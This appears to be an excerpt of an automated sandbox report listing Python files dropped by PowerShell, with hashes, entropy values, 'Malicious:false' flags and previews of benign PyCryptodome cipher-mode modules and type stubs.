                                                                                                                                                                                                            SHA-512:8029C5F0C2789E73A777C9F7609170DE099DDAF80CFDFDC912D2A48740661A5F831B729D7A2CCCC8A4A32CC22CE22480D4871615F49BCE958DB154B9120D4A3C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25025
                                                                                                                                                                                                            Entropy (8bit):4.677063276164775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/I+9n1nXrBamtA6/c1VaO37n2x4Cg4wCy4g3NeVRWPv8GxvBsm:0rskrs9Vqb1n71/wH2x4swgg9eXWHVv5
                                                                                                                                                                                                            MD5:3E9660F26D207EF9A4C5A4CE2B3772AE
                                                                                                                                                                                                            SHA1:CBF049D0BDDB1592528978F77BA3AB75D2AC6227
                                                                                                                                                                                                            SHA-256:C65239369F4CF282246AC590FB630A4A83F9340BB41578DF6E419334F70642B5
                                                                                                                                                                                                            SHA-512:B8C5726C48B001E5B04FB512121466A27C4D35D90F5C2A890311BAF1B1E1B079C24BDE8CDAFB07090017BE1CC5B464F46E8C7074547CE2BC20BAA97FFA94894E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1647
                                                                                                                                                                                                            Entropy (8bit):4.397477650476907
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                                                                                            MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                                                                                            SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                                                                                            SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                                                                                            SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11014
                                                                                                                                                                                                            Entropy (8bit):4.5201226161912444
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:dSMFQHvo5H4dIL3EwOOscx2JL5qwG47W9ytU4p2EVQ57T1qytU4eputAVQqWFCb0:dSCQHvAyOH2JLcOq+U46kYU4o7KCDmJ
                                                                                                                                                                                                            MD5:B28169CB2CE510E4A7D3D55FDB214DDE
                                                                                                                                                                                                            SHA1:9137A29D0D79352EBDFC04AE641F99263DF5B850
                                                                                                                                                                                                            SHA-256:813D8A9659151C4834B488257C205DBAD70BFEE9E45ED6C18CFB9B9010BF23DA
                                                                                                                                                                                                            SHA-512:2731A03C91ECA96F06E7A97DD8207B674688A4C6BD7338C124CB61FF63DE231C33237F2073592C6E4216A947419E5F1A69E8D65B1821189880B793DBC8ED283B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_cfb.py : CFB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):753
                                                                                                                                                                                                            Entropy (8bit):4.690976940000698
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REP+LjT3lGNAYsEHnRNne3yFnR3Fne1
                                                                                                                                                                                                            MD5:652CF8ED15152064BFF8807277058B5A
                                                                                                                                                                                                            SHA1:D868B6EBCDF4B5AE76DD495FBD506879BCE96B88
                                                                                                                                                                                                            SHA-256:FA48D3431DA67394394BCFC79AFA506311A5579E9234299215B06514EC72EDEA
                                                                                                                                                                                                            SHA-512:2354A738EBA79324311746672CFB436ECB558212FCFC044030A1C932F0E6EC74E539A38994A1BB7F69D5B84EB2C2F49EDAE11243A8D4B11B6B304425FBE8334F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16205
                                                                                                                                                                                                            Entropy (8bit):4.422045978034575
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:d5QHvltxqH2LakMiITNEriO+gU46o2U4ozC1ShJnwBil3iYPlIidiSSZD:DeLF7AYT6o2TozWShkaSCl6
                                                                                                                                                                                                            MD5:67B5D4EFCCC2EBFD2EF0F2A0D43A0D36
                                                                                                                                                                                                            SHA1:613EB622D976517FFB544792C4331093E28237C4
                                                                                                                                                                                                            SHA-256:2CB2F14BD56381E0DB323B2E585A3803A667C37F9A852D407AB2B62E09EFBC68
                                                                                                                                                                                                            SHA-512:46C59C7ADD4B04DAE6BD85190CD1885347986F6DE4E151543D97DD2E52EFAE0817CB43C96E145CB0491BF45BDAF33BE4619D5C66FDF6015BA5F9A20905E9C5E5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ctr.py : CTR mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):827
                                                                                                                                                                                                            Entropy (8bit):4.593860739765962
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1REP+LjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:Y+rLcZVjTvesLeM
                                                                                                                                                                                                            MD5:8A35D43812049862067E29C878476C74
                                                                                                                                                                                                            SHA1:A12D8A91A7657976F857C769188B625FA27F0697
                                                                                                                                                                                                            SHA-256:D5EAD8152A6D1DA357A8B3B4D79E468B3A1201CB4406E83951F7B32F48A2FD1D
                                                                                                                                                                                                            SHA-512:18F5C59C21EFB6867FE1B837E0ECC55524B2382F0C95A493CEE012DB691C1B0D6D3BED81D46CDBEE48A9D4C11CE47726F38A98E398557141E90B794B61D25017
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):14861
                                                                                                                                                                                                            Entropy (8bit):4.674561793295729
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/IqCwPVpgaMYO4SU4sU4pzzRWPvguXnYPR:0rskrs9Vq6wk4STsTpz1WHgi6
                                                                                                                                                                                                            MD5:DE4BA47AE12810A28473AE92C6C1B6A3
                                                                                                                                                                                                            SHA1:52749E06D5B7D25BE027F4C0BB46FED0AF52F890
                                                                                                                                                                                                            SHA-256:8643C44AB29F164FBC9F76686CE8D8203A8F9E685ACFD0F8FC22AF9643782E83
                                                                                                                                                                                                            SHA-512:9B981CE7693F99FC926C884EDEC2659DDD7B507E49F33A24B6B732D25F0B2543BE29158FE6FBFB73CEA1025324CC6EDDB2E23678981CCAFE75BBE09CFBA7B9D6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1590
                                                                                                                                                                                                            Entropy (8bit):4.436811038410909
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                                                                                            MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                                                                                            SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                                                                                            SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                                                                                            SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8529
                                                                                                                                                                                                            Entropy (8bit):4.499365740356179
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:dBFQHvoWieqW8XSXMxJYuwG2m0/EfQb7nk+qIbpktAV7+qWKWIRI:dfQHvPz8XjJYuwVkZi7Z1WIRI
                                                                                                                                                                                                            MD5:BA708C28472BF8A266985DCA4CCD93B1
                                                                                                                                                                                                            SHA1:C4E6D55A46EDEB5FDDF8A8BF15A1BA198C94815B
                                                                                                                                                                                                            SHA-256:BEB1D881C681295AE01316E857A5AB8D289A4A1B30DCF97ED405FEA5C694892A
                                                                                                                                                                                                            SHA-512:D0543D25A7AA3787CF681EBEEDEE2D9229DCB03B8D53125F7AFB40B48040E4B3F4CC912A02C86EEE1E4E2ECAD24669B89174FECC4C199BB94733B159650570A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/mode_ecb.py : ECB mode..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):611
                                                                                                                                                                                                            Entropy (8bit):4.857553785112337
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                                                                                            MD5:12949DC06561F6F7C431BFB79A4F5D05
                                                                                                                                                                                                            SHA1:68C7903BA776DC6B8C9B2F3EDA82A9033C001FCC
                                                                                                                                                                                                            SHA-256:652C427E0BBCA4838334715C3BF18979F96EB0B3FCFBA8D67992A9D8F7A3CA4D
                                                                                                                                                                                                            SHA-512:5B2F563099AFD298366B739064E648ADFA3B42C0A9906A95D48F6AE8B48EBD0EBA01FB864FFB2F5F0BE81493DBE0DBD4DB0EECB6300B35C53FBEBBA92B27E2A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):21917
                                                                                                                                                                                                            Entropy (8bit):4.7218595521732905
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:0rskrs9Vqjd6xv931hir4YTTTrTXWMXDR/:0r6q0j3qr5WI/
                                                                                                                                                                                                            MD5:EE69CE26FAD75A0F241475DBA3E1697C
                                                                                                                                                                                                            SHA1:23E08C68DFE560AC0124221A41D323D0410BEEEC
                                                                                                                                                                                                            SHA-256:113176FE53453C3E932E18ABFEECF654A0F87E19995DA8D84BEB0E1A85BC3027
                                                                                                                                                                                                            SHA-512:087A7577A3EEC8F1F1E058B23794F4DCFB66F4337827073F3B1563107B88637977448DF594388F77469E2072D75E48901CD0D497F276168BB9CEB173750321F2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1586
                                                                                                                                                                                                            Entropy (8bit):4.431900531457141
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                                                                                            MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                                                                                            SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                                                                                            SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                                                                                            SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):20467
                                                                                                                                                                                                            Entropy (8bit):4.484216973410615
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/IRqz86WmyyJHDrlKXhf5dOvbY40S/SHfp+afbRewJse9q/bqO5f4:0rskrs9VqQqIVhhd6Y4OLe8seyZ5fhD2
                                                                                                                                                                                                            MD5:EC64CBF9BFF2B388C5D116CAFA222813
                                                                                                                                                                                                            SHA1:0EBA256BF6195A5A15DF1FE9F17AF6BF28689037
                                                                                                                                                                                                            SHA-256:3B85F66B106E11ABFF974D8C0505286D895F7A586770ED65317335CD0EEF2FD7
                                                                                                                                                                                                            SHA-512:69D0E34D535BA0C98276B862265B827F6F2C7EC5A52A77878BEBFD3F0C81E9D366DFBDA3D8BF4A28F9D672491C343CE7E40DB51E9940DF175C745B48DB89AD52
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1267
                                                                                                                                                                                                            Entropy (8bit):4.510576229003074
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                                                                                            MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                                                                                            SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                                                                                            SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                                                                                            SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10491
                                                                                                                                                                                                            Entropy (8bit):4.4882632072003945
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:dLFQHvoPoxH4dILt52ALFxKiDqwG4rW9ytU4p2EVQ577BqotU4SputAVsqW1mYhH:d5QHv/pwADKKqO6+U46Q2U4c3amgQO
                                                                                                                                                                                                            MD5:EADCECA62EE60C2F04D2E18ADB5FB72C
                                                                                                                                                                                                            SHA1:3A40BCD84E318E1641DFFDFCF7509957DD75A997
                                                                                                                                                                                                            SHA-256:670B77041005E3E61FA2E3A80E23E454051039FE3F310C8B53A7A8F02A56B986
